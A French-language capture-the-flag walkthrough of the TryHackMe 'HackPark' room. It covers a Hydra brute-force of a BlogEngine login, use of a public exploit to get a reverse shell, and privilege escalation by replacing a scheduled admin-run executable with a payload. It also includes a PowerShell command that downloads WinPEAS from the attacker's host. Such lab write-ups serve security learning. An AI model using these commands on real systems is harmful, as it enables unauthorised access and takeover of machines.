HackPark

Task 1

On reconnait facilement le clow de "ça" sur le site internet. Son nom est donc pennywise

image-1649870717787.png

Task 2

On découvre facilement la page de login :

image-1649870767930.png

Comme preque toutes les pages de login, elle accepte les requêtes en POST.

Pour trouver le mot de passe on va, comme le site nous l'indique, utiliser le bruteforce.

Pour cela, Tryhackme nous conseil l'utilisation de Hydra, nous connaissons l'ip et l'url ainsi que le username qui doit surement être admin.

Pour trouver le payload, il nous suffit d'intercepter une requête avec BURP :

image-1649871030164.png

On utilise alors hydra avec le payload que nous avons intercepté en modifiant le champ Password pour y ajouter notre variable :

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.179.4 http-post-form "/Account/login.aspx?ReturnURL=/admin/:
__VIEWSTATE=4q1qD1fzYHY9%2FOvBdMJ7Q1hY0XYt92lrKfOKtcXS4M0r5NsAh7U8xNubcx%2F4TAcUvF%2Bi9pv8ukzgDUSRIxovgnYiBEtfuDCiEgr
bTjwqUSd1Ckl9%2BITH3%2BEeCc1TPP6gK%2FSZVDmfYCUxPUErzb3pLHqkCaZkUlBvKRMXhykmUpwMZhxMbCST%2B4FTVVO0E%2BldCGofrgZ7d6fLmA
Iq1PbZnvgiXhzZFOQy%2FAX8Lyx1HoedgMg32v4lqEPMVBFLC24zZpXKSPPlSUevopCy3E1JKpo2CnGIhN%2FGET1hkzuP8nfN%2FDtiE16QgjszPi52v
a%2BOKfthz2S4BcLiIIC0qbH0VFeFHS%2BfxjN9zHTIkY81szCJCM3t&__EVENTVALIDATION=56WwCyBnFv0%2BsSxO%2Br9KbpK32ZvyiEg6ZC9HU28
DE%2Br9sNOGaNvwnp49SlEjNU5K6n%2Be0IEl2Ld9baWEyj5WtEn7YNqyj2iD9z2y%2FOEEzrjnLWapQiW0CDINn5VZz3SXVm1ujxMSJI6q7cck4%2Bge
S%2B%2Bq1xOmAouT6ZVCGHKgqrpDUqKk&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24
Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

On obtient alors rapidement notre mot de passe :

image-1649871245215.png

Task 3

On commence par nous demander la version de blogengine, un petit tour dans la section about nous aporte cette réponse :

image-1649871393271.png

On recherche alors une vulnérabilité sur cette version :

image-1649871499847.png

La première vulnérabilité nous revoie vers le script de l'exploit, on retrouve la CVE dans le commentaire de ce dernier :

image-1649871896240.png

On suit les instructions du script à savoir :

On obtient donc notre Reverse shell :

image-1649873378965.png

Task 4

Notre shell est légèrement instable. On va en créer un meilleur avec msfconsole (Reverse Shell)

On récupère les informations système avec sysinfo.

Nous n'avons pas les droits nécessaire pour récupérer le flag du User jeff. Il nous faut d'abord réaliser une priv esc.

Pour cela on commence par regarder les services qui tournent sous windows. On y découvre le service WScheduler.exe qui correspond au service WindowsScheduler qui permet de lancer automatiquement des scripts tout les x temps.

En analysant les logs du Service présents dans Program files (x86)/WindowsScheduler/Events on découvre que Message.exe est exécuté toute les 30secondes avec les droits Admin.

On va alors remplacer le fichier Message.exe par notre payload pour obtenir un shell admin.

Pour cela on copie notre payload à la place du fichier Message.exe :

cp ../../Windows/Temp/rev.exe Message.exe

Puis on quitte notre shell et on relance l'attente avec Metasploit pour attendre que Message.exe soit automatiquement exécuté.

Si tout s'est bien passé notre nouveau shell se lance dans les 30secondes qui suivent mais cette fois en tant qu'admin :

image-1650193011577.png

Il ne reste plus qu'à obtenir les flags user et root.

Task 5

Cette fois nous allons faire la même chose sans metasploit (Reverse Shell)

Pour cela on revient à la fin de la Task 3 avec un reverse shell instable.

Pour trouver le service qui est compromis on va lancer WinPeas.bat la version windows de linpeas.

On l'upload sur notre machine :

powershell -c "Invoke-WebRequest -Uri 'http://10.11.69.123:1234/winpeas.bat' -OutFile 'C:\Windows\Temp\winpeas.bat'"

Puis on le lance et on obtient donc la date de création : 8/3/2019, 10:43:23 AM


Revision #6
Created 9 April 2022 18:02:28 by White Rose
Updated 18 April 2022 15:23:47 by White Rose